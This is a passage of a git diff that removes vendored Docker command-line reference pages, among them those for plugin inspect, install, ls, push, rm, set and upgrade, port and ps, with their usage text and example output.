-```bash
-$ docker plugin inspect tiborvass/sample-volume-plugin:latest
-```
-```JSON
-{
-  "Id": "8c74c978c434745c3ade82f1bc0acf38d04990eaf494fa507c16d9f1daa99c21",
-  "Name": "tiborvass/sample-volume-plugin:latest",
-  "PluginReference": "tiborvas/sample-volume-plugin:latest",
-  "Enabled": true,
-  "Config": {
-    "Mounts": [
-      {
-        "Name": "",
-        "Description": "",
-        "Settable": null,
-        "Source": "/data",
-        "Destination": "/data",
-        "Type": "bind",
-        "Options": [
-          "shared",
-          "rbind"
-        ]
-      },
-      {
-        "Name": "",
-        "Description": "",
-        "Settable": null,
-        "Source": null,
-        "Destination": "/foobar",
-        "Type": "tmpfs",
-        "Options": null
-      }
-    ],
-    "Env": [
-      "DEBUG=1"
-    ],
-    "Args": null,
-    "Devices": null
-  },
-  "Manifest": {
-    "ManifestVersion": "v0",
-    "Description": "A test plugin for Docker",
-    "Documentation": "https://docs.docker.com/engine/extend/plugins/",
-    "Interface": {
-      "Types": [
-        "docker.volumedriver/1.0"
-      ],
-      "Socket": "plugins.sock"
-    },
-    "Entrypoint": [
-      "plugin-sample-volume-plugin",
-      "/data"
-    ],
-    "Workdir": "",
-    "User": {
-    },
-    "Network": {
-      "Type": "host"
-    },
-    "Capabilities": null,
-    "Mounts": [
-      {
-        "Name": "",
-        "Description": "",
-        "Settable": null,
-        "Source": "/data",
-        "Destination": "/data",
-        "Type": "bind",
-        "Options": [
-          "shared",
-          "rbind"
-        ]
-      },
-      {
-        "Name": "",
-        "Description": "",
-        "Settable": null,
-        "Source": null,
-        "Destination": "/foobar",
-        "Type": "tmpfs",
-        "Options": null
-      }
-    ],
-    "Devices": [
-      {
-        "Name": "device",
-        "Description": "a host device to mount",
-        "Settable": null,
-        "Path": "/dev/cpu_dma_latency"
-      }
-    ],
-    "Env": [
-      {
-        "Name": "DEBUG",
-        "Description": "If set, prints debug messages",
-        "Settable": null,
-        "Value": "1"
-      }
-    ],
-    "Args": {
-      "Name": "args",
-      "Description": "command line arguments",
-      "Settable": null,
-      "Value": [
-
-      ]
-    }
-  }
-}
-```
-(output formatted for readability)
-
-
-```bash
-$ docker plugin inspect -f '{{.Id}}' tiborvass/sample-volume-plugin:latest
-```
-```
-8c74c978c434745c3ade82f1bc0acf38d04990eaf494fa507c16d9f1daa99c21
-```
-
-
-## Related information
-
-* [plugin create](plugin_create.md)
-* [plugin enable](plugin_enable.md)
-* [plugin disable](plugin_disable.md)
-* [plugin install](plugin_install.md)
-* [plugin ls](plugin_ls.md)
-* [plugin push](plugin_push.md)
-* [plugin rm](plugin_rm.md)
-* [plugin set](plugin_set.md)
-* [plugin upgrade](plugin_upgrade.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_install.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_install.md
deleted file mode 100644
index 0601193ce0..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_install.md
+++ /dev/null
@@ -1,71 +0,0 @@
----
-title: "plugin install"
-description: "the plugin install command description and usage"
-keywords: "plugin, install"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# plugin install
-
-```markdown
-Usage:  docker plugin install [OPTIONS] PLUGIN [KEY=VALUE...]
-
-Install a plugin
-
-Options:
-      --alias string            Local name for plugin
-      --disable                 Do not enable the plugin on install
-      --grant-all-permissions   Grant all permissions necessary to run the plugin
-      --help                    Print usage
-```
-
-Installs and enables a plugin. Docker looks first for the plugin on your Docker
-host. If the plugin does not exist locally, then the plugin is pulled from
-the registry. Note that the minimum required registry version to distribute
-plugins is 2.3.0
-
-
-The following example installs `vieus/sshfs` plugin and [set](plugin_set.md) it's env variable
-`DEBUG` to 1. Install consists of pulling the plugin from Docker Hub, prompting
-the user to accept the list of privileges that the plugin needs, settings parameters
- and enabling the plugin.
-
-```bash
-$ docker plugin install vieux/sshfs DEBUG=1
-
-Plugin "vieux/sshfs" is requesting the following privileges:
- - network: [host]
- - device: [/dev/fuse]
- - capabilities: [CAP_SYS_ADMIN]
-Do you grant the above permissions? [y/N] y
-vieux/sshfs
-```
-
-After the plugin is installed, it appears in the list of plugins:
-
-```bash
-$ docker plugin ls
-
-ID                  NAME                  TAG                 DESCRIPTION                ENABLED
-69553ca1d123        vieux/sshfs           latest              sshFS plugin for Docker    true
-```
-
-## Related information
-
-* [plugin create](plugin_create.md)
-* [plugin disable](plugin_disable.md)
-* [plugin enable](plugin_enable.md)
-* [plugin inspect](plugin_inspect.md)
-* [plugin ls](plugin_ls.md)
-* [plugin push](plugin_push.md)
-* [plugin rm](plugin_rm.md)
-* [plugin set](plugin_set.md)
-* [plugin upgrade](plugin_upgrade.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_ls.md
deleted file mode 100644
index 7a3426d95f..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_ls.md
+++ /dev/null
@@ -1,53 +0,0 @@
----
-title: "plugin ls"
-description: "The plugin ls command description and usage"
-keywords: "plugin, list"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# plugin ls
-
-```markdown
-Usage:  docker plugin ls [OPTIONS]
-
-List plugins
-
-Aliases:
-  ls, list
-
-Options:
-      --help	   Print usage
-      --no-trunc   Don't truncate output
-```
-
-Lists all the plugins that are currently installed. You can install plugins
-using the [`docker plugin install`](plugin_install.md) command.
-
-Example output:
-
-```bash
-$ docker plugin ls
-
-ID                  NAME                             TAG                 DESCRIPTION                ENABLED
-69553ca1d123        tiborvass/sample-volume-plugin   latest              A test plugin for Docker   true
-```
-
-## Related information
-
-* [plugin create](plugin_create.md)
-* [plugin disable](plugin_disable.md)
-* [plugin enable](plugin_enable.md)
-* [plugin inspect](plugin_inspect.md)
-* [plugin install](plugin_install.md)
-* [plugin push](plugin_push.md)
-* [plugin rm](plugin_rm.md)
-* [plugin set](plugin_set.md)
-* [plugin upgrade](plugin_upgrade.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_push.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_push.md
deleted file mode 100644
index e61d10994c..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_push.md
+++ /dev/null
@@ -1,50 +0,0 @@
----
-title: "plugin push"
-description: "the plugin push command description and usage"
-keywords: "plugin, push"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-```markdown
-Usage:  docker plugin push [OPTIONS] PLUGIN[:TAG]
-
-Push a plugin to a registry
-
-Options:
-      --help       Print usage
-```
-
-Use `docker plugin create` to create the plugin. Once the plugin is ready for distribution,
-use `docker plugin push` to share your images to the Docker Hub registry or to a self-hosted one.
-
-Registry credentials are managed by [docker login](login.md).
-
-The following example shows how to push a sample `user/plugin`.
-
-```bash
-
-$ docker plugin ls
-ID                  NAME                  TAG                 DESCRIPTION                ENABLED
-69553ca1d456        user/plugin           latest              A sample plugin for Docker false
-$ docker plugin push user/plugin
-```
-
-## Related information
-
-* [plugin create](plugin_create.md)
-* [plugin disable](plugin_disable.md)
-* [plugin enable](plugin_enable.md)
-* [plugin inspect](plugin_inspect.md)
-* [plugin install](plugin_install.md)
-* [plugin ls](plugin_ls.md)
-* [plugin rm](plugin_rm.md)
-* [plugin set](plugin_set.md)
-* [plugin upgrade](plugin_upgrade.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_rm.md
deleted file mode 100644
index 323ce83f3c..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_rm.md
+++ /dev/null
@@ -1,56 +0,0 @@
----
-title: "plugin rm"
-description: "the plugin rm command description and usage"
-keywords: "plugin, rm"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# plugin rm
-
-```markdown
-Usage:  docker plugin rm [OPTIONS] PLUGIN [PLUGIN...]
-
-Remove one or more plugins
-
-Aliases:
-  rm, remove
-
-Options:
-      -f, --force  Force the removal of an active plugin
-          --help   Print usage
-```
-
-Removes a plugin. You cannot remove a plugin if it is enabled, you must disable
-a plugin using the [`docker plugin disable`](plugin_disable.md) before removing
-it (or use --force, use of force is not recommended, since it can affect
-functioning of running containers using the plugin).
-
-The following example disables and removes the `sample-volume-plugin:latest` plugin;
-
-```bash
-$ docker plugin disable tiborvass/sample-volume-plugin
-tiborvass/sample-volume-plugin
-
-$ docker plugin rm tiborvass/sample-volume-plugin:latest
-tiborvass/sample-volume-plugin
-```
-
-## Related information
-
-* [plugin create](plugin_create.md)
-* [plugin disable](plugin_disable.md)
-* [plugin enable](plugin_enable.md)
-* [plugin inspect](plugin_inspect.md)
-* [plugin install](plugin_install.md)
-* [plugin ls](plugin_ls.md)
-* [plugin push](plugin_push.md)
-* [plugin set](plugin_set.md)
-* [plugin upgrade](plugin_upgrade.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_set.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_set.md
deleted file mode 100644
index c206a8a760..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_set.md
+++ /dev/null
@@ -1,99 +0,0 @@
----
-title: "plugin set"
-description: "the plugin set command description and usage"
-keywords: "plugin, set"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# plugin set
-
-```markdown
-Usage:  docker plugin set PLUGIN KEY=VALUE [KEY=VALUE...]
-
-Change settings for a plugin
-
-Options:
-      --help                    Print usage
-```
-
-Change settings for a plugin. The plugin must be disabled.
-
-The settings currently supported are:
- * env variables
- * source of mounts
- * path of devices
- * args
-
-The following example change the env variable `DEBUG` on the
-`sample-volume-plugin` plugin.
-
-```bash
-$ docker plugin inspect -f {{.Settings.Env}} tiborvass/sample-volume-plugin
-[DEBUG=0]
-
-$ docker plugin set tiborvass/sample-volume-plugin DEBUG=1
-
-$ docker plugin inspect -f {{.Settings.Env}} tiborvass/sample-volume-plugin
-[DEBUG=1]
-```
-
-The following example change the source of the `mymount` mount on
-the `myplugin` plugin.
-
-```bash
-$ docker plugin inspect -f '{{with $mount := index .Settings.Mounts 0}}{{$mount.Source}}{{end}}' myplugin
-/foo
-
-$ docker plugins set myplugin mymount.source=/bar
-
-$ docker plugin inspect -f '{{with $mount := index .Settings.Mounts 0}}{{$mount.Source}}{{end}}' myplugin
-/bar
-```
-
-Note: since only `source` is settable in `mymount`, `docker plugins set mymount=/bar myplugin` would work too.
-
-The following example change the path of the `mydevice` device on
-the `myplugin` plugin.
-
-```bash
-$ docker plugin inspect -f '{{with $device := index .Settings.Devices 0}}{{$device.Path}}{{end}}' myplugin
-/dev/foo
-
-$ docker plugins set myplugin mydevice.path=/dev/bar
-
-$ docker plugin inspect -f '{{with $device := index .Settings.Devices 0}}{{$device.Path}}{{end}}' myplugin
-/dev/bar
-```
-
-Note: since only `path` is settable in `mydevice`, `docker plugins set mydevice=/dev/bar myplugin` would work too.
-
-The following example change the source of the args on the `myplugin` plugin.
-
-```bash
-$ docker plugin inspect -f '{{.Settings.Args}}' myplugin
-["foo", "bar"]
-
-$ docker plugins set myplugin args="foo bar baz"
-
-$ docker plugin inspect -f '{{.Settings.Args}}' myplugin
-["foo", "bar", "baz"]
-```
-
-## Related information
-
-* [plugin create](plugin_create.md)
-* [plugin disable](plugin_disable.md)
-* [plugin enable](plugin_enable.md)
-* [plugin inspect](plugin_inspect.md)
-* [plugin install](plugin_install.md)
-* [plugin ls](plugin_ls.md)
-* [plugin push](plugin_push.md)
-* [plugin rm](plugin_rm.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_upgrade.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_upgrade.md
deleted file mode 100644
index 20efc577aa..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_upgrade.md
+++ /dev/null
@@ -1,84 +0,0 @@
----
-title: "plugin upgrade"
-description: "the plugin upgrade command description and usage"
-keywords: "plugin, upgrade"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# plugin upgrade
-
-```markdown
-Usage:  docker plugin upgrade [OPTIONS] PLUGIN [REMOTE]
-
-Upgrade a plugin
-
-Options:
-      --disable-content-trust   Skip image verification (default true)
-      --grant-all-permissions   Grant all permissions necessary to run the plugin
-      --help                    Print usage
-      --skip-remote-check       Do not check if specified remote plugin matches existing plugin image
-```
-
-Upgrades an existing plugin to the specified remote plugin image. If no remote
-is specified, Docker will re-pull the current image and use the updated version.
-All existing references to the plugin will continue to work.
-The plugin must be disabled before running the upgrade.
-
-The following example installs `vieus/sshfs` plugin, uses it to create and use
-a volume, then upgrades the plugin.
-
-```bash
-$ docker plugin install vieux/sshfs DEBUG=1
-
-Plugin "vieux/sshfs:next" is requesting the following privileges:
- - network: [host]
- - device: [/dev/fuse]
- - capabilities: [CAP_SYS_ADMIN]
-Do you grant the above permissions? [y/N] y
-vieux/sshfs:next
-
-$ docker volume create -d vieux/sshfs:next -o sshcmd=root@1.2.3.4:/tmp/shared -o password=XXX sshvolume
-sshvolume
-$ docker run -it -v sshvolume:/data alpine sh -c "touch /data/hello"
-$ docker plugin disable -f vieux/sshfs:next
-viex/sshfs:next
-
-# Here docker volume ls doesn't show 'sshfsvolume', since the plugin is disabled
-$ docker volume ls
-DRIVER              VOLUME NAME
-
-$ docker plugin upgrade vieux/sshfs:next vieux/sshfs:next
-Plugin "vieux/sshfs:next" is requesting the following privileges:
- - network: [host]
- - device: [/dev/fuse]
- - capabilities: [CAP_SYS_ADMIN]
-Do you grant the above permissions? [y/N] y
-Upgrade plugin vieux/sshfs:next to vieux/sshfs:next
-$ docker plugin enable vieux/sshfs:next
-viex/sshfs:next
-$ docker volume ls
-DRIVER              VOLUME NAME
-viuex/sshfs:next    sshvolume
-$ docker run -it -v sshvolume:/data alpine sh -c "ls /data"
-hello
-```
-
-## Related information
-
-* [plugin create](plugin_create.md)
-* [plugin disable](plugin_disable.md)
-* [plugin enable](plugin_enable.md)
-* [plugin inspect](plugin_inspect.md)
-* [plugin install](plugin_install.md)
-* [plugin ls](plugin_ls.md)
-* [plugin push](plugin_push.md)
-* [plugin rm](plugin_rm.md)
-* [plugin set](plugin_set.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/port.md b/vendor/github.com/docker/docker/docs/reference/commandline/port.md
deleted file mode 100644
index bc90b6e786..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/port.md
+++ /dev/null
@@ -1,41 +0,0 @@
----
-title: "port"
-description: "The port command description and usage"
-keywords: "port, mapping, container"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# port
-
-```markdown
-Usage:  docker port CONTAINER [PRIVATE_PORT[/PROTO]]
-
-List port mappings or a specific mapping for the container
-
-Options:
-      --help   Print usage
-```
-
-You can find out all the ports mapped by not specifying a `PRIVATE_PORT`, or
-just a specific mapping:
-
-    $ docker ps
-    CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS                                            NAMES
-    b650456536c7        busybox:latest      top                 54 minutes ago      Up 54 minutes       0.0.0.0:1234->9876/tcp, 0.0.0.0:4321->7890/tcp   test
-    $ docker port test
-    7890/tcp -> 0.0.0.0:4321
-    9876/tcp -> 0.0.0.0:1234
-    $ docker port test 7890/tcp
-    0.0.0.0:4321
-    $ docker port test 7890/udp
-    2014/06/24 11:53:36 Error: No public port '7890/udp' published for test
-    $ docker port test 7890
-    0.0.0.0:4321
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/ps.md b/vendor/github.com/docker/docker/docs/reference/commandline/ps.md
deleted file mode 100644
index 1d5f31da88..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/ps.md
+++ /dev/null
@@ -1,384 +0,0 @@
----
-title: "ps"
-description: "The ps command description and usage"
-keywords: "container, running, list"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# ps
-
-```markdown
-Usage: docker ps [OPTIONS]
-
-List containers
-
-Options:
-  -a, --all             Show all containers (default shows just running)
-  -f, --filter value    Filter output based on conditions provided (default [])
-                        - exited=<int> an exit code of <int>
-                        - label=<key> or label=<key>=<value>
-                        - status=(created|restarting|removing|running|paused|exited)
-                        - name=<string> a container's name
-                        - id=<ID> a container's ID
-                        - before=(<container-name>|<container-id>)
-                        - since=(<container-name>|<container-id>)
-                        - ancestor=(<image-name>[:tag]|<image-id>|<image@digest>)
-                          containers created from an image or a descendant.
-                        - is-task=(true|false)
-                        - health=(starting|healthy|unhealthy|none)
-      --format string   Pretty-print containers using a Go template
-      --help            Print usage
-  -n, --last int        Show n last created containers (includes all states) (default -1)
-  -l, --latest          Show the latest created container (includes all states)
-      --no-trunc        Don't truncate output
-  -q, --quiet           Only display numeric IDs
-  -s, --size            Display total file sizes
-```
-
-Running `docker ps --no-trunc` showing 2 linked containers.
-
-```bash
-$ docker ps
-
-CONTAINER ID        IMAGE                        COMMAND                CREATED              STATUS              PORTS               NAMES
-4c01db0b339c        ubuntu:12.04                 bash                   17 seconds ago       Up 16 seconds       3300-3310/tcp       webapp
-d7886598dbe2        crosbymichael/redis:latest   /redis-server --dir    33 minutes ago       Up 33 minutes       6379/tcp            redis,webapp/db
-```
-
-The `docker ps` command only shows running containers by default. To see all
-containers, use the `-a` (or `--all`) flag:
-
-```bash
-$ docker ps -a
-```
-
-`docker ps` groups exposed ports into a single range if possible. E.g., a
-container that exposes TCP ports `100, 101, 102` displays `100-102/tcp` in
-the `PORTS` column.
-
-## Filtering
-
-The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there is more
-than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`)
-
-The currently supported filters are:
-
-* id (container's id)
-* label (`label=<key>` or `label=<key>=<value>`)
-* name (container's name)
-* exited (int - the code of exited containers. Only useful with `--all`)
-* status (created|restarting|running|removing|paused|exited|dead)
-* ancestor (`<image-name>[:<tag>]`,  `<image id>` or `<image@digest>`) - filters containers that were created from the given image or a descendant.
-* before (container's id or name) - filters containers created before given id or name
-* since (container's id or name) - filters containers created since given id or name
-* isolation (default|process|hyperv)   (Windows daemon only)
-* volume (volume name or mount point) - filters containers that mount volumes.
-* network (network id or name) - filters containers connected to the provided network
-* health (starting|healthy|unhealthy|none) - filters containers based on healthcheck status
-
-#### Label
-
-The `label` filter matches containers based on the presence of a `label` alone or a `label` and a
-value.
-
-The following filter matches containers with the `color` label regardless of its value.
-
-```bash
-$ docker ps --filter "label=color"
-
-CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES
-673394ef1d4c        busybox             "top"               47 seconds ago      Up 45 seconds                           nostalgic_shockley
-d85756f57265        busybox             "top"               52 seconds ago      Up 51 seconds                           high_albattani
-```
-
-The following filter matches containers with the `color` label with the `blue` value.
-
-```bash
-$ docker ps --filter "label=color=blue"
-
-CONTAINER ID        IMAGE               COMMAND             CREATED              STATUS              PORTS               NAMES
-d85756f57265        busybox             "top"               About a minute ago   Up About a minute                       high_albattani
-```
-
-#### Name
-
-The `name` filter matches on all or part of a container's name.
-
-The following filter matches all containers with a name containing the `nostalgic_stallman` string.
-
-```bash
-$ docker ps --filter "name=nostalgic_stallman"
-
-CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES
-9b6247364a03        busybox             "top"               2 minutes ago       Up 2 minutes                            nostalgic_stallman
-```
-
-You can also filter for a substring in a name as this shows:
-
-```bash
-$ docker ps --filter "name=nostalgic"
-
-CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES
-715ebfcee040        busybox             "top"               3 seconds ago       Up 1 second                             i_am_nostalgic
-9b6247364a03        busybox             "top"               7 minutes ago       Up 7 minutes                            nostalgic_stallman
-673394ef1d4c        busybox             "top"               38 minutes ago      Up 38 minutes                           nostalgic_shockley
-```
-
-#### Exited
-
-The `exited` filter matches containers by exist status code. For example, to
-filter for containers that have exited successfully:
-
-```bash
-$ docker ps -a --filter 'exited=0'
-
-CONTAINER ID        IMAGE             COMMAND                CREATED             STATUS                   PORTS                      NAMES
-ea09c3c82f6e        registry:latest   /srv/run.sh            2 weeks ago         Exited (0) 2 weeks ago   127.0.0.1:5000->5000/tcp   desperate_leakey
-106ea823fe4e        fedora:latest     /bin/sh -c 'bash -l'   2 weeks ago         Exited (0) 2 weeks ago                              determined_albattani
-48ee228c9464        fedora:20         bash                   2 weeks ago         Exited (0) 2 weeks ago                              tender_torvalds
-```
-
-#### Killed containers
-
-You can use a filter to locate containers that exited with status of `137`
-meaning a `SIGKILL(9)` killed them.
-
-```bash
-$ docker ps -a --filter 'exited=137'
-CONTAINER ID        IMAGE               COMMAND                CREATED             STATUS                       PORTS               NAMES
-b3e1c0ed5bfe        ubuntu:latest       "sleep 1000"           12 seconds ago      Exited (137) 5 seconds ago                       grave_kowalevski
-a2eb5558d669        redis:latest        "/entrypoint.sh redi   2 hours ago         Exited (137) 2 hours ago                         sharp_lalande
-```
-
-Any of these events result in a `137` status:
-
-* the `init` process of the container is killed manually
-* `docker kill` kills the container
-* Docker daemon restarts which kills all running containers
-
-#### Status
-
-The `status` filter matches containers by status. You can filter using
-`created`, `restarting`, `running`, `removing`, `paused`, `exited` and `dead`. For example,
-to filter for `running` containers:
-
-```bash
-$ docker ps --filter status=running
-
-CONTAINER ID        IMAGE                  COMMAND             CREATED             STATUS              PORTS               NAMES
-715ebfcee040        busybox                "top"               16 minutes ago      Up 16 minutes                           i_am_nostalgic
-d5c976d3c462        busybox                "top"               23 minutes ago      Up 23 minutes                           top
-9b6247364a03        busybox                "top"               24 minutes ago      Up 24 minutes                           nostalgic_stallman
-```
-
-To filter for `paused` containers:
-
-```bash
-$ docker ps --filter status=paused
-
-CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS                      PORTS               NAMES
-673394ef1d4c        busybox             "top"               About an hour ago   Up About an hour (Paused)                       nostalgic_shockley
-```
-
-#### Ancestor
-
-The `ancestor` filter matches containers based on its image or a descendant of
-it. The filter supports the following image representation:
-
-- image
-- image:tag
-- image:tag@digest
-- short-id
-- full-id
-
-If you don't specify a `tag`, the `latest` tag is used. For example, to filter
-for containers that use the latest `ubuntu` image:
-
-```bash
-$ docker ps --filter ancestor=ubuntu
-
-CONTAINER ID        IMAGE               COMMAND             CREATED              STATUS              PORTS               NAMES
-919e1179bdb8        ubuntu-c1           "top"               About a minute ago   Up About a minute                       admiring_lovelace
-5d1e4a540723        ubuntu-c2           "top"               About a minute ago   Up About a minute                       admiring_sammet
-82a598284012        ubuntu              "top"               3 minutes ago        Up 3 minutes                            sleepy_bose
-bab2a34ba363        ubuntu              "top"               3 minutes ago        Up 3 minutes                            focused_yonath
-```
-
-Match containers based on the `ubuntu-c1` image which, in this case, is a child
-of `ubuntu`:
-
-```bash
-$ docker ps --filter ancestor=ubuntu-c1
-
-CONTAINER ID        IMAGE               COMMAND             CREATED              STATUS              PORTS               NAMES
-919e1179bdb8        ubuntu-c1           "top"               About a minute ago   Up About a minute                       admiring_lovelace
-```
-
-Match containers based on the `ubuntu` version `12.04.5` image:
-
-```bash
-$ docker ps --filter ancestor=ubuntu:12.04.5
-
-CONTAINER ID        IMAGE               COMMAND             CREATED              STATUS              PORTS               NAMES
-82a598284012        ubuntu:12.04.5      "top"               3 minutes ago        Up 3 minutes                            sleepy_bose
-```
-
-The following matches containers based on the layer `d0e008c6cf02` or an image
-that have this layer in its layer stack.
-
-```bash
-$ docker ps --filter ancestor=d0e008c6cf02
-
-CONTAINER ID        IMAGE               COMMAND             CREATED              STATUS              PORTS               NAMES
-82a598284012        ubuntu:12.04.5      "top"               3 minutes ago        Up 3 minutes                            sleepy_bose
-```
-
-#### Before
-
-The `before` filter shows only containers created before the container with
-given id or name. For example, having these containers created:
-
-```bash
-$ docker ps
-
-CONTAINER ID        IMAGE       COMMAND       CREATED              STATUS              PORTS              NAMES
-9c3527ed70ce        busybox     "top"         14 seconds ago       Up 15 seconds                          desperate_dubinsky
-4aace5031105        busybox     "top"         48 seconds ago       Up 49 seconds                          focused_hamilton
-6e63f6ff38b0        busybox     "top"         About a minute ago   Up About a minute                      distracted_fermat
-```
-
-Filtering with `before` would give:
-
-```bash
-$ docker ps -f before=9c3527ed70ce
-
-CONTAINER ID        IMAGE       COMMAND       CREATED              STATUS              PORTS              NAMES
-4aace5031105        busybox     "top"         About a minute ago   Up About a minute                      focused_hamilton
-6e63f6ff38b0        busybox     "top"         About a minute ago   Up About a minute                      distracted_fermat
-```
-
-#### Since
-
-The `since` filter shows only containers created since the container with given
-id or name. For example, with the same containers as in `before` filter:
-
-```bash
-$ docker ps -f since=6e63f6ff38b0
-
-CONTAINER ID        IMAGE       COMMAND       CREATED             STATUS              PORTS               NAMES
-9c3527ed70ce        busybox     "top"         10 minutes ago      Up 10 minutes                           desperate_dubinsky
-4aace5031105        busybox     "top"         10 minutes ago      Up 10 minutes                           focused_hamilton
-```
-
-#### Volume
-
-The `volume` filter shows only containers that mount a specific volume or have
-a volume mounted in a specific path:
-
-```bash{% raw %}
-$ docker ps --filter volume=remote-volume --format "table {{.ID}}\t{{.Mounts}}"
-CONTAINER ID        MOUNTS
-9c3527ed70ce        remote-volume
-
-$ docker ps --filter volume=/data --format "table {{.ID}}\t{{.Mounts}}"
-CONTAINER ID        MOUNTS
-9c3527ed70ce        remote-volume
-{% endraw %}```
-
-#### Network
-
-The `network` filter shows only containers that are connected to a network with
-a given name or id.
-
-The following filter matches all containers that are connected to a network
-with a name containing `net1`.
-
-```bash
-$ docker run -d --net=net1 --name=test1 ubuntu top
-$ docker run -d --net=net2 --name=test2 ubuntu top
-
-$ docker ps --filter network=net1
-
-CONTAINER ID        IMAGE       COMMAND       CREATED             STATUS              PORTS               NAMES
-9d4893ed80fe        ubuntu      "top"         10 minutes ago      Up 10 minutes                           test1
-```
-
-The network filter matches on both the network's name and id. The following
-example shows all containers that are attached to the `net1` network, using
-the network id as a filter;
-
-```bash
-{% raw %}
-$ docker network inspect --format "{{.ID}}" net1
-{% endraw %}
-
-8c0b4110ae930dbe26b258de9bc34a03f98056ed6f27f991d32919bfe401d7c5
-
-$ docker ps --filter network=8c0b4110ae930dbe26b258de9bc34a03f98056ed6f27f991d32919bfe401d7c5
-
-CONTAINER ID        IMAGE       COMMAND       CREATED             STATUS              PORTS               NAMES
-9d4893ed80fe        ubuntu      "top"         10 minutes ago      Up 10 minutes                           test1
-```
-
-## Formatting
-
-The formatting option (`--format`) pretty-prints container output using a Go
-template.
-
-Valid placeholders for the Go template are listed below:
-
-Placeholder   | Description
---------------|----------------------------------------------------------------------------------------------------
-`.ID`         | Container ID
-`.Image`      | Image ID
-`.Command`    | Quoted command
-`.CreatedAt`  | Time when the container was created.
-`.RunningFor` | Elapsed time since the container was started.
-`.Ports`      | Exposed ports.
-`.Status`     | Container status.
-`.Size`       | Container disk size.
-`.Names`      | Container names.
-`.Labels`     | All labels assigned to the container.
-`.Label`      | Value of a specific label for this container. For example `'{% raw %}{{.Label "com.docker.swarm.cpu"}}{% endraw %}'`
-`.Mounts`     | Names of the volumes mounted in this container.
-`.Networks`   | Names of the networks attached to this container.
-
-When using the `--format` option, the `ps` command will either output the data
-exactly as the template declares or, when using the `table` directive, includes
-column headers as well.
-
-The following example uses a template without headers and outputs the `ID` and
-`Command` entries separated by a colon for all running containers:
-
-```bash
-{% raw %}
-$ docker ps --format "{{.ID}}: {{.Command}}"
-{% endraw %}
-
-a87ecb4f327c: /bin/sh -c #(nop) MA
-01946d9d34d8: /bin/sh -c #(nop) MA
-c1d3b0166030: /bin/sh -c yum -y up
-41d50ecd2f57: /bin/sh -c #(nop) MA
-```
-
-To list all running containers with their labels in a table format you can use:
-
-```bash
-{% raw %}
-$ docker ps --format "table {{.ID}}\t{{.Labels}}"
-{% endraw %}
-
-CONTAINER ID        LABELS
-a87ecb4f327c        com.docker.swarm.node=ubuntu,com.docker.swarm.storage=ssd
-01946d9d34d8
-c1d3b0166030        com.docker.swarm.node=debian,com.docker.swarm.cpu=6
